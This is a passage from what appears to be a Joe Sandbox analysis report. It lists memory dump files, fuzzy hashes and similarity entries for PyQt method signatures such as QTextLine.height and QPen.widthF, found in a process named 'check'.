                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?useBool_Effects@FromHints@@HoverLongStyle
                                                                                                                                                                                                                • String ID: QStyleHints$useHoverEffects$useHoverEffects(self) -> bool
                                                                                                                                                                                                                • API String ID: 4102397269-227917006
                                                                                                                                                                                                                • Opcode ID: 33eed10f73b7049befdabf31c755359ca6bbb407ad900a2b9374ce14e0e36b48
                                                                                                                                                                                                                • Instruction ID: be90194fb323f57bd645e5814147ee8e555f2f610b48a34a8f2a5d7d3c0ed361
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33eed10f73b7049befdabf31c755359ca6bbb407ad900a2b9374ce14e0e36b48
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38012CB5A08A46D1EB10DF71E8986A937A8FB54754F9140B6CA9D03320CF7CD649C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
                                                                                                                                                                                                                • String ID: QTextImageFormat$height$height(self) -> float
                                                                                                                                                                                                                • API String ID: 2584946227-3151405701
                                                                                                                                                                                                                • Opcode ID: fd768665d0c17dcd5b57ec2c590b362a963c9154a024cd71df3dd570a7992f02
                                                                                                                                                                                                                • Instruction ID: 43039ab8a5aba251cf556a2c016550984c8b8335fcd695830d5cd0b58c204b59
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd768665d0c17dcd5b57ec2c590b362a963c9154a024cd71df3dd570a7992f02
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6011AB5A08E46C1EB109F61E8486A937A8FB94B55F9140B2CE4C03320DF7DD65AC780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_DropEnabled@FromItem@@LongStandard
                                                                                                                                                                                                                • String ID: QStandardItem$isDropEnabled$isDropEnabled(self) -> bool
                                                                                                                                                                                                                • API String ID: 1493504921-1892244150
                                                                                                                                                                                                                • Opcode ID: c2a7de62048a6f8fb32650f50791a700e1d27296324a58bac757c60e9ba90b0e
                                                                                                                                                                                                                • Instruction ID: dd92b0ce6e5cb5d1f7a12ed638c004a58012f5ea917e1c6bfe2aed16adee260e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2a7de62048a6f8fb32650f50791a700e1d27296324a58bac757c60e9ba90b0e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 370128B5B08A47C1EB109F71E8986A833A8FB94B85FA140B6CA5C43320CF7DD959C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?deviceDoubleFloat_FromPixelRatio@Window@@
                                                                                                                                                                                                                • String ID: QWindow$devicePixelRatio$devicePixelRatio(self) -> float
                                                                                                                                                                                                                • API String ID: 3287233405-1767006637
                                                                                                                                                                                                                • Opcode ID: a0fe11ddb423bc3d5149061f5343d19de5dbdbc3bcf96ac03c9bda55776493cf
                                                                                                                                                                                                                • Instruction ID: c6f3c6404c84d9c5343ab63094a944a44e78ce020f7f1af2f90ce8f45a81461b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0fe11ddb423bc3d5149061f5343d19de5dbdbc3bcf96ac03c9bda55776493cf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E001ECB5A08A46C1EB50DF65E8486A937A8FB95B45FA140B2CA5D43330CF7DD98AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?leading@DoubleFloat_Font@@From
                                                                                                                                                                                                                • String ID: QRawFont$leading$leading(self) -> float
                                                                                                                                                                                                                • API String ID: 617535915-3077518540
                                                                                                                                                                                                                • Opcode ID: 7378f0b0bc36ca5fbf9a464e97da6615c4e09b5be7b51091b57ecd517134532f
                                                                                                                                                                                                                • Instruction ID: 2958f877cc5d7e0459aa697fb975d289b05cf13e9cbcb8d2af55058b7c2ff3d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7378f0b0bc36ca5fbf9a464e97da6615c4e09b5be7b51091b57ecd517134532f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E01ECB5A08B46C1EB10DF75E8586A937A8FB94745F9140B2CA5D43320CF7DD949C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?miterDoubleFloat_FromLimit@PainterPathStroker@@
                                                                                                                                                                                                                • String ID: QPainterPathStroker$miterLimit$miterLimit(self) -> float
                                                                                                                                                                                                                • API String ID: 1108256340-4006628480
                                                                                                                                                                                                                • Opcode ID: 92db6312f7f2d039ee461fa54fa794bae75f566db4c078a00d5bb3851c6744a7
                                                                                                                                                                                                                • Instruction ID: 444279a7a6a038dce10bdf9d537f528c3672ec6b5cca550a6b03a4a33810127c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92db6312f7f2d039ee461fa54fa794bae75f566db4c078a00d5bb3851c6744a7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6301ECB5A08A46C1EB20DF75E8486A937A8FB54B44FA140B6CA5D43320DF7DD55AC780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?leading@DoubleFloat_FromLine@@Text
                                                                                                                                                                                                                • String ID: QTextLine$leading$leading(self) -> float
                                                                                                                                                                                                                • API String ID: 619423061-3212982793
                                                                                                                                                                                                                • Opcode ID: b98cf2cc52f751869b42174ee9b697911b12cc89bdde306263e33069777b055e
                                                                                                                                                                                                                • Instruction ID: 4af79692e600a68ae5eeae8a7dafb17e81192b5e651e442da449d5ac454aa66a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b98cf2cc52f751869b42174ee9b697911b12cc89bdde306263e33069777b055e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D01ECB5A08A56C1EB10DF65E8986A933B8FB54795F9140B2CA5D47320CF7DD58AC340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?height@DoubleFloat_FromLine@@Text
                                                                                                                                                                                                                • String ID: QTextLine$height$height(self) -> float
                                                                                                                                                                                                                • API String ID: 541853136-3096497767
                                                                                                                                                                                                                • Opcode ID: 14d68237d2863db5ea7894f5591de8b88868eda07a9c98c80cb6289de3b89335
                                                                                                                                                                                                                • Instruction ID: 42141e174e07a45ae66b73cec1743781775fe47d12cfda4b829e2b7de23904d3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14d68237d2863db5ea7894f5591de8b88868eda07a9c98c80cb6289de3b89335
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C101ECB5A08A46C1EB10DF65E8886A933A8FB55B45F9140B2CA5D47320CF7DE94AC340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?widthDoubleFloat_FromPen@@
                                                                                                                                                                                                                • String ID: QPen$widthF$widthF(self) -> float
